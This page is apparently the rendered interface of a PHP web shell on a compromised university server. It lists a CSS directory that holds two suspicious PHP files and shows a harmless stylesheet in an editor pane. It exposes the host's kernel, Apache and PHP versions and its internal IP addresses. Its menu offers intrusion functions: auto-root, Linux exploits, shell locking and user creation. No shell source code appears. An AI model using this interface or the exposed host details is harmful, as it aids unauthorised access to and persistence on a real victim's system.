Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
css /
[ HOME SHELL ]
Name
Size
Permission
Action
addons
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
academico.css
3.01
KB
-rw-r--r--
avisos.css
1.62
KB
-rw-r--r--
beca.css
3.32
KB
-rw-r--r--
bootstrap.css
187.84
KB
-rw-r--r--
bootstrap.min.css
152.11
KB
-rw-r--r--
contraloriaEstilos.css
3.6
KB
-rw-r--r--
diplomado.css
3.33
KB
-rw-r--r--
directorio.css
3.75
KB
-rw-r--r--
estilosmenu.css
2.54
KB
-rw-r--r--
etica.css
1.7
KB
-rw-r--r--
evaluacion.css
3.33
KB
-rw-r--r--
evaluacionEstilos.css
3.33
KB
-rw-r--r--
index.css
3.16
KB
-rw-r--r--
iso.css
2.25
KB
-rw-r--r--
licitacion.css
1.7
KB
-rw-r--r--
logotipos.css
3.31
KB
-rw-r--r--
mdb.css
311.07
KB
-rw-r--r--
mdb.lite.css
242.01
KB
-rw-r--r--
mdb.lite.min.css
198.8
KB
-rw-r--r--
mdb.min.css
252.83
KB
-rw-r--r--
ofertaacademica.css
3.44
KB
-rw-r--r--
oferta.css
2.19
KB
-rw-r--r--
POA.css
3.32
KB
-rw-r--r--
reglamentos.css
3.75
KB
-rw-r--r--
sistema.css
3.31
KB
-rw-r--r--
style.min.css
259
B
-rw-r--r--
urdvcihg.php
760
B
-rw-r--r--
vida2.css
2.17
KB
-rw-r--r--
vinculacion.css
3.07
KB
-rw-r--r--
worksec.php
1.02
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vida2.css
/* Required height of parents of the Full Page Intro and Intro itself */ html, body, .view { height: 100%; } @import url("https://fonts.googleapis.com/css?family=Raleway:400,400i,700"); *, *::before, *::after { margin: 0; padding: 0; box-sizing: border-box; } body { background-color: #e4e9ed; font-family: Raleway, sans-serif; } br { margin-bottom: 2%; } .header { width: 100%; height: 80vh; position: relative; display: grid; grid-template-rows: max-content 1fr; grid-template-columns: 1fr max-content; text-align: center; } .header__logo { fill: white; width: 3rem; padding: 1rem; cursor: pointer; } .header__bg { width: 100%; height: 105%; background-image: url("../img_2025/identidadutp.jpeg"); background-size: cover; background-position: center; filter: brightness(50%); clip-path: polygon(0 0, 100% 0, 100% 80%, 0 100%); position: absolute; top: 0; left: 0; z-index: -1; } .header__title { grid-area: 2 / 1 / 2 / 3; align-self: center; justify-self: center; color: #28a745; text-transform: uppercase; font-size: 4rem; text-shadow: 0px 2px 4px rgba(0, 0, 0, 0.4); margin-top: -5rem; animation: fadeInUp 1s ease-in-out; } .about { width: 100%; padding: 5rem 0; text-align: center; } .about__title { margin-bottom: 2rem; font-size: 2rem; text-transform: uppercase; color: #28a745; } .about__text { width: 80%; margin: auto; font-size: 1.1rem; text-align: justify; color: #232323; line-height: 1.6; background: #fff; padding: 2rem; border-radius: 10px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } .about__text--content { animation: fadeInLeft 1s ease-in-out; } .politica { text-align: center; font-size: 2rem; color: #28a745; font-weight: bold; margin-top: 3rem; } @keyframes fadeInUp { from { opacity: 0; transform: translateY(20px); } to { opacity: 1; transform: translateY(0); } } @keyframes fadeInLeft { from { opacity: 0; transform: translateX(-20px); } to { opacity: 1; transform: translateX(0); } }
Close